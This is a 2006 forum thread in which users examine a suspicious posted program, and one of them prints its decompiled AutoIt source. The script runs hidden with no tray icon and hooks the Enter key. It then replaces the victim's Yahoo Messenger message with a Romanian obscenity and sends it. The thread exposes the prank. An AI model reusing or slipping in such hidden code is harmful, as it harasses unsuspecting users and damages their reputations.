Dr. Doom Posted April 12, 2006 Posted April 12, 2006 can anybody tell me the source code of this program?cool.rar
GrungeRocker Posted April 12, 2006 Posted April 12, 2006 can anybody tell me the source code of this program?no one will look into your programm..no one will trust you.... [font="Verdana"]In work:[list=1][*]InstallIt[*]New version of SpaceWar[/list] [/font]
ConsultingJoe Posted April 12, 2006 Posted April 12, 2006 no one will look into your programm..no one will trust you....LOL, I just tried it at school, I think it's a virus but it didn't do anything, no CPU usage, no gui, it looks like it just sits there.Whats this Virus suppossed to do??? Check out ConsultingJoe.com
Busti Posted April 12, 2006 Posted April 12, 2006 (edited) ; <AUT2EXE VERSION: 3.1.1.0> ; ---------------------------------------------------------------------------- ; <AUT2EXE INCLUDE-START: D:\WINDOWS\Desktop\autoIT\super-tare.AU3> ; ---------------------------------------------------------------------------- opt("WinTitleMatchMode", 4) #NoTrayIcon HotKeySet("{ENTER}", "ff") HotKeySet("!dc", "iesi") while 1 sleep(300) wend Func ff() ;ControlSetText("Untitled", "", "Edit1", "This is a line of text in the notepad window") HotKeySet("{ENTER}") $bb=WinGetHandle("classname=IMClass") ControlSetText($bb, "", "YIMInputWindow1", "Sunt tarfa" ) send("{ENTER}") HotKeySet("{ENTER}", "ff") EndFunc Func iesi() exit EndFunc ; ---------------------------------------------------------------------------- ; <AUT2EXE INCLUDE-END: D:\WINDOWS\Desktop\autoIT\super-tare.AU3> ; ---------------------------------------------------------------------------- blub...... KEK Edited April 12, 2006 by Busti My UDF's : Startet on : 06.06.2006_CaseSearchOrReplaceStr();~> Searches OR Replaces a String,;~> With or Without Casesensivity
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now